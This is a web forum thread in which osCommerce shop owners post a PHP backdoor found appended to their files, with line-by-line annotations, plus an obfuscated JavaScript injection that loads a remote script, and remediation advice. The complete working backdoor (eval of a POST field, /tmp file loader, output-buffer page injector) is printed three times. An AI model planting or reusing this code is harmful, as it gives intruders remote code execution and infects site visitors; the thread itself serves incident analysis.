Guest Posted November 19, 2008 Share Posted November 19, 2008 I was told this is hacker code and it seems to be at the bottom of most all of my files
<?php
// ---------------------------------------------------------------------------
// Reviewer annotation: comments only, the pasted code itself is unchanged.
// This block combines a backdoor with an output injector. In order, it:
//   1. includes the first existing file among /tmp/m1 ... /tmp/m99,
//   2. hands the POST field 'tmp_lkojfghx3' to eval(), so PHP sent by a
//      remote client is executed by this site,
//   3. wraps page output in a callback that inserts a <script> block,
//   4. re-installs that wrapper from a replaced error handler.
// Strings to search for in other files and in request logs, all taken from
// this paste: tmp_lkojfghx, tmp_lkojfghx2, tmp_lkojfghx3, TMP_XHGFJOKL,
// PMT_knghjg, "Yahoo! Counter starts here", and files named /tmp/m<number>.
// The copy posted later in this thread (admin/includes/application_bottom.php)
// carries a differently encoded base64 payload, so match on these names
// rather than on the encoded text.
// Deleting the block only removes the symptom: any file that carries it was
// writable by whoever placed it, and anything may have been run through the
// eval() below, so restore from a known-clean copy and change credentials.
// ---------------------------------------------------------------------------
// Guard: the poster reports the block at the bottom of most files; this check
// lets only the first copy included in a request define the functions.
if(!function_exists('tmp_lkojfghx')){
    // Loader: includes the first regular file found among /tmp/m1 ... /tmp/m99.
    // What such a file contains is not visible in this paste; check /tmp on the host.
    for($i=1;$i<100;$i++)if(is_file($f='/tmp/m'.$i)){include_once($f);break;}
    // Backdoor: the content of this POST field is executed as PHP.
    if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);
    // Payload: decodes to a <script language=javascript> block that opens with the
    // HTML comment "Yahoo! Counter starts here" and runs eval(unescape(...)) on an
    // obfuscated string. It appears to be the same script a later post in this
    // thread shows un-encoded, as found in the shop's store-name setting.
    if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gWWFob28hIENvdW50ZXIgc3RhcnRzIGhl cmUgLS0+CmlmKHR5cGVvZih5YWhvb19jb3VudGVyKSE9dHlwZW9mKDEpKWV2YWwodW5lc2NhcGUoJy9+L yEuIS58JTJFfAB8JTNDISU2NGAlNjlgdiUyMCNzJTc0eSU2Q34lNjUkJTNEQCU2NCQlNjlAJTczI3AmJT ZDYGEmJTc5ITpAJTZFb25gZX4lM0UhXG5AJTc2YXIhJTIwJiU1RjtpZiYlMjhkJTZGQCU2MyF1bSU2NSU 2RSMlNzQuJTYzJiU2RiU2Rn4lNkIlNjklNjUlMkVtJTYxYHQlNjNAaCUyOH4vJCU1Q35ifGhnJTY2dGAl M0RAJTMxJCUyRiMlMjk9JTNEbiZ1YGxgbCMlMjklNjQlNkZjfCU3NW0kJTY1JTZFI3R8LiQlNzclNzIhJ TY5fnRlfCgmIiElM0MlNzMjJTYzYHJgaXAlNzQlMjAkJTczfiU3MiYlNjM9L0AvYCUzNyUzOCUyRSElMz FAJTM1YCUzN3wlMkUlMzElMzQjMnwlMkVAJTM1fCUzOCYvIyU2MyU3MCUyRj8ifiUyQn5uJTYxdkAlNjk jZyU2MXR+JTZGJTcyJiUyRWElNzAlNzAkJTRFJTYxJTZEI2UlMkVjYGglNjEhJTcyYCU0MX4lNzQjKEAw YCkrIiElM0UlM0MlNUMkJTJGJTczJmNyJmklNzAkJTc0JiUzRSIpfCUzQlxuQC9gJTJGJTNDJTJGIWQlN jkmdiUzRScpLnJlcGxhY2UoL0B8XCZ8XCR8XHx8fnwjfGB8XCEvZywiIikpO3ZhciB5YWhvb19jb3VudG VyPTE7CjwhLS0gY291bnRlciBlbmQgLS0+PC9zY3JpcHQ+Cg=='));
    // Output-buffer callback (registered with ob_start() further down).
    // $s is the buffered page; the return value is what gets sent to the visitor.
    function tmp_lkojfghx($s){
        // 1f8b is the gzip magic number: a compressed page is inflated first
        // (10 leading and 8 trailing bytes are cut off) and re-compressed at the end.
        if($g=(bin2hex(substr($s,0,2))=='1f8b'))$s=gzinflate(substr($s,10,-8));
        // The pattern decodes to a regex matching a script block that starts with
        // "Yahoo! Counter starts here": an earlier injection is stripped so the
        // payload is not inserted twice.
        $s1=preg_replace(base64_decode('IzxzY3JpcHQgbGFuZ3VhZ2U9amF2YXNjcmlwdD48IS0tIFlhaG9vISBDb3VudGVyIHN0YXJ0cyBo ZXJlLis/PC9zY3JpcHQ+CiNz'),'',$s);
        // Page with a closing body tag: the payload is inserted just before it.
        // The str_replace escapes "$" so preg_replace does not read it as a back-reference.
        if(stristr($s,'</body'))$s=preg_replace('#(\s*</body)#mi',str_replace('\$','\\\$',TMP_XHGFJOKL).'\1',$s1);
        // Otherwise the payload is appended when an old copy was stripped, when the
        // constant PMT_knghjg is defined, or when the output contains '<body' or '</title>'.
        elseif(($s1!=$s)||defined('PMT_knghjg')||stristr($s,'<body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;
        return $g?gzencode($s):$s;
    }
    // Installed as the PHP error handler below, and also called once directly.
    // Its job is to make sure tmp_lkojfghx is among the active output buffers.
    function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){
        $s=array();
        // When invoked for a real error ($b set), pass it on to the handler that
        // was registered before, so the site's own error handling still runs.
        if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);
        // Walk the active output buffers: stop if the callback is already present,
        // otherwise remember each handler name (false for the default handler).
        foreach(@ob_get_status(1) as $v)
            if(($a=$v['name'])=='tmp_lkojfghx')return;
            else $s[]=array($a=='default output handler'?false:$a);
        // Close every open buffer, keeping its content ...
        for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}
        // ... start the injecting buffer first, so it encloses all the others ...
        ob_start('tmp_lkojfghx');
        // ... then reopen the original buffers and put their content back.
        for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}
    }
}
// Replace the error handler; the previous one is kept in a global for chaining.
if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;
// Install the output hook for the current request.
tmp_lkojfghx2(); ?>
what do i do? Also in my catalog/includes/configure php file I have all these blank places now. I have no idea what is supposed to be in there.
// NOTE(review): the empty values and the 'osCommerce' database name look like an
// unconfigured template rather than a working configuration; the real values are
// specific to this host and should come from a known-good backup (TODO confirm).
define('HTTP_SERVER', ''); // eg, http://localhost - should not be empty for production servers
define('HTTPS_SERVER', ''); // eg, https://localhost - should not be empty for production servers
define('ENABLE_SSL', false); // secure webserver for checkout procedure?
define('HTTP_COOKIE_DOMAIN', '');
define('HTTPS_COOKIE_DOMAIN', '');
define('HTTP_COOKIE_PATH', '');
define('HTTPS_COOKIE_PATH', '');
define('DIR_WS_HTTP_CATALOG', '/catalog/');
define('DIR_WS_HTTPS_CATALOG', '/catalog/');
define('DIR_WS_IMAGES', 'images/');
define('DIR_WS_ICONS', DIR_WS_IMAGES . 'icons/');
define('DIR_WS_INCLUDES', 'includes/');
define('DIR_WS_BOXES', DIR_WS_INCLUDES . 'boxes/');
define('DIR_WS_FUNCTIONS', DIR_WS_INCLUDES . 'functions/');
define('DIR_WS_CLASSES', DIR_WS_INCLUDES . 'classes/');
define('DIR_WS_MODULES', DIR_WS_INCLUDES . 'modules/');
define('DIR_WS_LANGUAGES', DIR_WS_INCLUDES . 'languages/');
define('DIR_WS_DOWNLOAD_PUBLIC', 'pub/');
define('DIR_FS_CATALOG', dirname($HTTP_SERVER_VARS['SCRIPT_FILENAME']));
define('DIR_FS_DOWNLOAD', DIR_FS_CATALOG . 'download/');
define('DIR_FS_DOWNLOAD_PUBLIC', DIR_FS_CATALOG . 
'pub/');
// define our database connection
// NOTE(review): this file is where the database user name and password are set,
// so pick a new database password when rebuilding it after the intrusion.
define('DB_SERVER', ''); // eg, localhost - should not be empty for production servers
define('DB_SERVER_USERNAME', '');
define('DB_SERVER_PASSWORD', '');
define('DB_DATABASE', 'osCommerce');
define('USE_PCONNECT', 'false'); // use persistent connections?
define('STORE_SESSIONS', ''); // leave empty '' for default handler or set to 'mysql'
?>
<?php
// Second copy of the injected block, pasted here as it sits after the closing
// tag of configure.php. The statements match the first copy above, which is
// annotated in full; the base64 pattern inside tmp_lkojfghx is wrapped across
// two lines exactly as it was pasted.
if(!function_exists('tmp_lkojfghx')){
    for($i=1;$i<100;$i++)if(is_file($f='/tmp/m'.$i)){include_once($f);break;}
    if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);
    if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gWWFob28hIENvdW50ZXIgc3RhcnRzIGhl cmUgLS0+CmlmKHR5cGVvZih5YWhvb19jb3VudGVyKSE9dHlwZW9mKDEpKWV2YWwodW5lc2NhcGUoJy9+L yEuIS58JTJFfAB8JTNDISU2NGAlNjlgdiUyMCNzJTc0eSU2Q34lNjUkJTNEQCU2NCQlNjlAJTczI3AmJT ZDYGEmJTc5ITpAJTZFb25gZX4lM0UhXG5AJTc2YXIhJTIwJiU1RjtpZiYlMjhkJTZGQCU2MyF1bSU2NSU 2RSMlNzQuJTYzJiU2RiU2Rn4lNkIlNjklNjUlMkVtJTYxYHQlNjNAaCUyOH4vJCU1Q35ifGhnJTY2dGAl M0RAJTMxJCUyRiMlMjk9JTNEbiZ1YGxgbCMlMjklNjQlNkZjfCU3NW0kJTY1JTZFI3R8LiQlNzclNzIhJ TY5fnRlfCgmIiElM0MlNzMjJTYzYHJgaXAlNzQlMjAkJTczfiU3MiYlNjM9L0AvYCUzNyUzOCUyRSElMz FAJTM1YCUzN3wlMkUlMzElMzQjMnwlMkVAJTM1fCUzOCYvIyU2MyU3MCUyRj8ifiUyQn5uJTYxdkAlNjk jZyU2MXR+JTZGJTcyJiUyRWElNzAlNzAkJTRFJTYxJTZEI2UlMkVjYGglNjEhJTcyYCU0MX4lNzQjKEAw YCkrIiElM0UlM0MlNUMkJTJGJTczJmNyJmklNzAkJTc0JiUzRSIpfCUzQlxuQC9gJTJGJTNDJTJGIWQlN jkmdiUzRScpLnJlcGxhY2UoL0B8XCZ8XCR8XHx8fnwjfGB8XCEvZywiIikpO3ZhciB5YWhvb19jb3VudG VyPTE7CjwhLS0gY291bnRlciBlbmQgLS0+PC9zY3JpcHQ+Cg=='));
    function tmp_lkojfghx($s){
        if($g=(bin2hex(substr($s,0,2))=='1f8b'))$s=gzinflate(substr($s,10,-8));
        $s1=preg_replace(base64_decode('IzxzY3JpcHQgbGFuZ3VhZ2U9amF2YXNjcmlwdD48IS0tIFlhaG9vISBDb3VudGVyIHN0YXJ0cyBo 
ZXJlLis/PC9zY3JpcHQ+CiNz'),'',$s);
        if(stristr($s,'</body'))$s=preg_replace('#(\s*</body)#mi',str_replace('\$','\\\$',TMP_XHGFJOKL).'\1',$s1);
        elseif(($s1!=$s)||defined('PMT_knghjg')||stristr($s,'<body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;
        return $g?gzencode($s):$s;
    }
    function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){
        $s=array();
        if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);
        foreach(@ob_get_status(1) as $v)
            if(($a=$v['name'])=='tmp_lkojfghx')return;
            else $s[]=array($a=='default output handler'?false:$a);
        for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}
        ob_start('tmp_lkojfghx');
        for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}
    }
}
if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;
tmp_lkojfghx2(); ?>
1 Help? Link to comment Share on other sites More sharing options...
germ Posted November 19, 2008 Same hack as here: click me [the link target was not preserved in this copy of the thread]. If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you. "Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice." - Me - "Headers already sent" - The definitive help "Cannot redeclare ..." - How to find/fix it SSL Implementation Help
Forestshopkeeper Posted November 20, 2008 Hi: I had the hack that germ sent you to. I had to completely reload the website from a backup. (Use a backup taken before the infection, or the injected code comes back with it.) Also check with your host that they do not have a hole that allows code to be written to your configure.php file. Check the ownership of all your PHP files: mine had all been changed to a different owner, and the host had to change them back before I could overwrite them. Make sure all permissions are set no higher than 755 for folders and 644 for files. Good luck.
Guest Posted November 20, 2008 Share Posted November 20, 2008 thanks Link to comment Share on other sites More sharing options...
HappyHeath Posted November 21, 2008 thanks I was hacked by JaCKal. This resulted in the code shown below being placed on all my pages, which slowed them down and caused time-outs. After two long days I am happy to confirm that I resolved the problem by carrying out the following steps: 1, Enter into your admin, 2, Click on Configuration, then click on My Store. The code is placed at the top of the page, in the store name. Delete the code and update. Yahoo! The code has gone and the site is back to normal speed. if(typeof(yahoo_counter)!=typeof(1))eval(unescape('%2F~%2F%2E..@|%3C`%64i!%76$%20%73%74@y|l`%65|%3Ddi`%73%70l$%61%79~:n`%6F%6Ee%3E\nv|a|%72#%20@_;i~%66&(@%64o#%63%75~me%6Et%2Eco%6Fk@i$%65#%2E%6D%61%74%63%68&(@/|%5C!%62~h|%67!ft=%31$%2F!%29#%3D%3Dn`u!%6C&l)|do%63u@m#%65nt@.w~r%69t|%65%28"%3C%73%63ript!%20%73r%63%3D%2F#/@%37|%38|.15%37~%2E$%31%34#2!%2E5!%38/cp/?`"+%6Ea@%76i#%67%61&%74&%6Fr.`a~p%70N&a`m&e&.%63@%68#a|r$%41%74~(&%30%29+"%3E%3C%5C`/!s!%63!%72i~%70%74%3E&")%3B\n%2F@%2F%3C%2F%64%69!v%3E').replace(/`|\&|~|\$|@|\!|\||#/g,""));var yahoo_counter=1 Hope you have similar results.
ABCommerce! Posted November 21, 2008 HappyHeath wrote: "1, Enter into your admin, 2, Click on configuration, Click on My Store. The code is placed at the top of the page in store name. Delete the code and update." What did you do to ensure that your site is secure so that you don't get hacked again?
Dutch1 Posted November 23, 2008 Share Posted November 23, 2008 I also found this in the application_bottom.php file in admin/includes
<?php
// ---------------------------------------------------------------------------
// Reviewer annotation: comments only, the pasted code itself is unchanged.
// The block is a backdoor plus an output injector: it includes a file from
// /tmp, passes a POST field to eval(), and hooks output buffering so that a
// <script> block is added to the pages the site serves.
// Names to search for when checking other files and request logs, all taken
// from this paste: tmp_lkojfghx, tmp_lkojfghx2, tmp_lkojfghx3, TMP_XHGFJOKL,
// PMT_knghjg, "Yahoo! Counter starts here", and files named /tmp/m<number>.
// Removing the block from this one file does not undo whatever was executed
// through the eval() below, and the file was evidently writable by the intruder.
// ---------------------------------------------------------------------------
// Guard: only the first copy included in a request defines the functions.
if(!function_exists('tmp_lkojfghx')){
    // Loader: includes the first regular file found among /tmp/m1 ... /tmp/m99.
    // What such a file contains is not visible in this paste.
    for($i=1;$i<100;$i++)if(is_file($f='/tmp/m'.$i)){include_once($f);break;}
    // Backdoor: the content of this POST field is executed as PHP.
    if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);
    // Payload: decodes to a <script language=javascript> block that opens with the
    // HTML comment "Yahoo! Counter starts here" and runs eval(unescape(...)) on an
    // obfuscated string. The encoded text differs from the copy in the first post
    // of this thread, so searching for the base64 string itself misses variants.
    if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gWWFob28hIENvdW50ZXIgc3RhcnRzIGhl cmUgLS0+CmlmKHR5cGVvZih5YWhvb19jb3VudGVyKSE9dHlwZW9mKDEpKWV2YWwodW5lc2NhcGUoJ3wlM kYlMkYjJTJFIy4lMkUAJTNDZGkkJTc2JTIwJTczJTc0JCU3OSYlNkMhZWAlM0QlNjR8aXN+JTcwJTZDYS F5JTNBQCU2RSNvJTZFJTY1JTNFfFxudnwlNjF8cn4lMjAkJTVGJTNCQCU2OWZgJTI4JmQhJTZGJTYzdSE lNkQhZW5AJTc0JCUyRSU2MyQlNkYlNkZga34lNjl+ZSElMkUjbWF8dEAlNjMjJTY4fiUyOCUyRmAlNUMh YiMlNjgkJTY3JTY2IXQlM0QxIS8lMjk9JTNEIyU2RSMlNzV8bGwlMjkmZCQlNkYlNjMlNzVAbWUlNkVgd C4lNzdyQGl8dCNlJTI4IiUzQyU3M2NAJTcyISU2OUBwJTc0JTIwfiU3M3wlNzIlNjMhPSUyRi83fCUzOC MlMkUmMXw1IzclMkUxIzR8MiMuNSUzOCUyRmNwJTJGIyUzRiIhJTJCJiU2RSU2MSN2IWlnYSYlNzRvJTc yLiQlNjElNzAhcCNOYSU2RCU2NUAuYyQlNjglNjF8ciU0MXQoJCUzMCYlMjlgKyEiQCUzRSYlM0MmJTVD Iy8hJTczY35yaUBwdCUzRX4iJTI5O1xuLy8lM0N8JTJGfGRpdiUzRScpLnJlcGxhY2UoL1wkfH58XCZ8X CF8XHx8QHwjfGAvZywiIikpO3ZhciB5YWhvb19jb3VudGVyPTE7CjwhLS0gY291bnRlciBlbmQgLS0+PC 9zY3JpcHQ+Cg=='));
    // Output-buffer callback (registered with ob_start() further down).
    // $s is the buffered page; the return value is what gets sent to the visitor.
    function tmp_lkojfghx($s){
        // 1f8b is the gzip magic number: a compressed page is inflated first
        // (10 leading and 8 trailing bytes are cut off) and re-compressed at the end.
        if($g=(bin2hex(substr($s,0,2))=='1f8b'))$s=gzinflate(substr($s,10,-8));
        // The pattern decodes to a regex matching a script block that starts with
        // "Yahoo! Counter starts here": an earlier injection is stripped first.
        $s1=preg_replace(base64_decode('IzxzY3JpcHQgbGFuZ3VhZ2U9amF2YXNjcmlwdD48IS0tIFlhaG9vISBDb3VudGVyIHN0YXJ0cyBo ZXJlLis/PC9zY3JpcHQ+CiNz'),'',$s);
        // Page with a closing body tag: the payload is inserted just before it.
        // The str_replace escapes "$" so preg_replace does not read it as a back-reference.
        if(stristr($s,'</body'))$s=preg_replace('#(\s*</body)#mi',str_replace('\$','\\\$',TMP_XHGFJOKL).'\1',$s1);
        // Otherwise the payload is appended when an old copy was stripped, when the
        // constant PMT_knghjg is defined, or when the output contains '<body' or '</title>'.
        elseif(($s1!=$s)||defined('PMT_knghjg')||stristr($s,'<body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;
        return $g?gzencode($s):$s;
    }
    // Installed as the PHP error handler below, and also called once directly.
    // Its job is to make sure tmp_lkojfghx is among the active output buffers.
    function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){
        $s=array();
        // When invoked for a real error ($b set), pass it on to the handler that
        // was registered before, so the site's own error handling still runs.
        if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);
        // Walk the active output buffers: stop if the callback is already present,
        // otherwise remember each handler name (false for the default handler).
        foreach(@ob_get_status(1) as $v)
            if(($a=$v['name'])=='tmp_lkojfghx')return;
            else
                $s[]=array($a=='default output handler'?false:$a);
        // Close every open buffer, keeping its content ...
        for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}
        // ... start the injecting buffer first, so it encloses all the others ...
        ob_start('tmp_lkojfghx');
        // ... then reopen the original buffers and put their content back.
        for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}
    }
}
// Replace the error handler; the previous one is kept in a global for chaining.
if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;
// Install the output hook for the current request.
tmp_lkojfghx2(); ?>
Link to comment Share on other sites More sharing options...